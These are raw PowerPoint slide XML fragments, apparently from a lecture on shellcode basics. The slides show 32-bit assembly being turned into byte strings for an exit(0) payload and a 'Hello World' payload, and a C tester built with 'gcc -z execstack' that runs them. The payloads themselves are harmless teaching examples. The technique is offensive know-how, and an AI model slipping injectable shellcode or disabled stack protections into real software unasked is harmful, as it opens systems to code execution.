                <a:lnTo>
                  <a:pt x="0" y="17138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41394" y="3801291"/>
            <a:ext cx="235585" cy="171450"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="235585" h="171450">
                <a:moveTo>
                  <a:pt x="85692" y="85693"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="171386"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="235439" y="85693"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85692" y="85693"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="76199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GB" spc="-5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936711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4608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Compiling</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-90" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Shellcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="521623" y="3134084"/>
            <a:ext cx="670560" cy="357505"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="670560" h="357504">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="670320" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="670320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1944" y="3134084"/>
            <a:ext cx="5027930" cy="357505"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5027930" h="357504">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5027399" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5027399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623" y="3496033"/>
            <a:ext cx="670560" cy="357505"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="670560" h="357504">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="670320" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="670320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1944" y="3496033"/>
            <a:ext cx="6368415" cy="357505"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6368415" h="357504">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6368040" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6368040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623" y="3857983"/>
            <a:ext cx="6368414" cy="357505"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="670560" h="357504">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="670320" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="670320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9100" y="4579648"/>
            <a:ext cx="639733" cy="372110"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="537210" h="372110">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="537123" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="537123" y="372074"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3720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8743" y="4579648"/>
            <a:ext cx="1241425" cy="372110"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1241425" h="372110">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1241219" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1241219" y="372074"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3720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9967" y="4579648"/>
            <a:ext cx="4558030" cy="372110"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4558030" h="372110">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4557550" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4557550" y="372074"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3720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9100" y="2361188"/>
            <a:ext cx="7565390" cy="311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Assemble to get object file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link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necessary object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50" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="347345">
              <a:lnSpc>
                <a:spcPts val="2865"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00AFEF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>$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nasm -f elf</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="24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exit_shellcode.asm</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="347345">
              <a:lnSpc>
                <a:spcPts val="2850"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab pos="1351280" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00AFEF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>$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ld	-o exit_shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="24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exit_shellcode.o</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="347345">
              <a:lnSpc>
                <a:spcPts val="2865"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00AFEF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>$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objdump -M intel -d</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="240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exit_shellcode</a:t>
            </a:r>
            <a:endParaRPr sz="2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Our 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shellcode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 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string, extracted from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Objdump:</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="450215" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1470"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="922655" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="MS UI Gothic"/>
                <a:cs typeface="MS UI Gothic"/>
              </a:rPr>
              <a:t>⇒	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9BBA58"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>"\x31\xc0\x31\xDB\xB0\x01\xCD\x80"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EABBD316-F4CA-41C0-B2B1-315FBD15C4ED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582430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253" y="1934065"/>
            <a:ext cx="7886700" cy="206979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07645" marR="5080" indent="-195580">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="8546465" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr u="heavy" dirty="0">
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="4AACC5"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr u="heavy" spc="-5" dirty="0">
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="4AACC5"/>
                  </a:solidFill>
                </a:uFill>
              </a:rPr>
              <a:t>Side</a:t>
            </a:r>
            <a:r>
              <a:rPr u="heavy" spc="-95" dirty="0">
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="4AACC5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4AACC5"/>
                  </a:solidFill>
                </a:uFill>
              </a:rPr>
              <a:t>No</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" u="heavy" spc="-5" dirty="0" err="1">
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="4AACC5"/>
                  </a:solidFill>
                </a:uFill>
              </a:rPr>
              <a:t>te</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" u="heavy" spc="-5" dirty="0">
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="4AACC5"/>
                  </a:solidFill>
                </a:uFill>
              </a:rPr>
              <a:t>:_______</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-MY" spc="-5" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-MY" spc="-5" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr spc="-5" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Stages</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10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of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-5" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" spc="-5" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr spc="-5" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Compilation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038600" y="600587"/>
            <a:ext cx="4961980" cy="5656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236E7451-B89F-4D73-A1CE-A938D5A2F86C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115947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6010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Testing Shellcode </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-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exit</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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7422" y="1855898"/>
            <a:ext cx="6307455" cy="30276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200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2200" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>/* gcc -z execstack -o tester tester.c</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-105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FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>*/  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>char shellcode[] </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="22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2200" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>"\x31\xc0\x31\xDB"</a:t>
            </a:r>
            <a:endParaRPr sz="2200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="92D050"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="2908935">
              <a:lnSpc>
                <a:spcPts val="2545"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2200" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>"\xB0\x01\xCD\x80"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="22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2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</a:pPr>
            <a:r>
              <a:rPr sz="2200" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="22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Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:endParaRPr sz="2200" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPts val="2625"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="22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2200" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="319405" marR="1687830">
              <a:lnSpc>
                <a:spcPts val="262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Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(*(void (*)())</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-10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nsolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>shellcode)();  return</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="22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sz="22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2200" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPts val="2545"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="220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200" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas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F728CF7-8CD2-4EB7-858D-A76071BE6F30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350228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39757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Testing</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-90" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Shellcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762000" y="2216829"/>
            <a:ext cx="6324599" cy="448638"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="670560" h="357505">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="670320" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="670320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0" y="2669910"/>
            <a:ext cx="2209799" cy="357505"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="670560" h="357505">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="670320" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="670320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1944" y="2669910"/>
            <a:ext cx="1341120" cy="357505"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1341120" h="357505">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1340641" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1340641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999" y="3031859"/>
            <a:ext cx="2209800" cy="357505"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="670560" h="357504">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="670320" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="670320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1944" y="3031859"/>
            <a:ext cx="1173480" cy="357505"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1173480" h="357504">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1173058" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1173058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1997" y="3393808"/>
            <a:ext cx="2209800" cy="357505"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="838200" h="357504">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="837903" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="837903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1995" y="3755757"/>
            <a:ext cx="685804" cy="357505"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="502919" h="357504">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="502737" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="502737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2102" y="4454889"/>
            <a:ext cx="7684770" cy="372110"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7684770" h="372110">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7684573" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7684573" y="372074"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3720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8617" y="5162540"/>
            <a:ext cx="5031740" cy="372110"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5031740" h="372110">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5031418" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5031418" y="372074"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3720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98237" y="2237731"/>
            <a:ext cx="7724140" cy="334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00AFEF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>gcc -z execstack -o tester</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-5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nsolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>tester.c</a:t>
            </a:r>
            <a:endParaRPr sz="2200" dirty="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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00AFEF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-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./tester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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00AFEF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>$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echo</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="24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$?</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="347345">
              <a:lnSpc>
                <a:spcPts val="2850"/>
              </a:lnSpc>
            </a:pP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0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00AFEF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1364615" marR="5080" indent="-1327150">
              <a:lnSpc>
                <a:spcPct val="197900"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="475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Our program returned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0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instead of 1, so our shellcode worked  Let’s try something more visual this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F776761-36C0-41B6-8805-5DB3F651EC2E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228278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50450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Hello </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>World</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-90" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Shellcode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0148" y="1867371"/>
            <a:ext cx="136525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mini_hello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906144" marR="5080" algn="just">
              <a:lnSpc>
                <a:spcPct val="101600"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>xor  mul  mov  push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7215" y="2115021"/>
            <a:ext cx="918844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ebx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ebx  ebx</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas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al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600" spc="-9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0x0a  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr sz="16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80090"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1514570" y="3170606"/>
          <a:ext cx="2072639" cy="267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422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push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510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0x646c726f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push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0x57202c6f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push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0x6c6c6548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mov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al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mov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bl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mov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ecx,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1600" spc="-3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esp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mov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dl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0x80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mov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al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xor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ebx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ebx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422">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="31750">
                        <a:lnSpc>
                          <a:spcPts val="167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675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0x80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021789" y="1936202"/>
            <a:ext cx="3222625" cy="279400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3222625" h="279400">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3222386" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3222386" y="279053"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2790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26869" y="1884346"/>
            <a:ext cx="3241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Machine code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string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constant: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9089" y="2277955"/>
            <a:ext cx="324675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solidFill>
                  <a:srgbClr val="9BBA58"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>"\x31\xDB\xF7\xE3\xB0\x0A\x50\x68</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="5080" algn="r">
              <a:lnSpc>
                <a:spcPts val="1650"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9BBA58"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>\x6F\x72\x6C\x64\x68\x6F\x2C\x20</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="5080" algn="r">
              <a:lnSpc>
                <a:spcPts val="1650"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9BBA58"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>\x57\x68\x48\x65\x6C\x6C\xB0\x04</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="5080" algn="r">
              <a:lnSpc>
                <a:spcPts val="1650"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9BBA58"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>\xB3\x01\x89\xE1\xB2\x0D\xCD\x80</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="109855">
              <a:lnSpc>
                <a:spcPts val="1664"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9BBA58"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>\xB0\x01\x31\xDB\xCD\x80"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16419" y="3742773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38</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="180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Bytes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C1DB1EB6-E515-480C-92A3-EA91A62CD565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275226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7252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Testing Shellcode </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
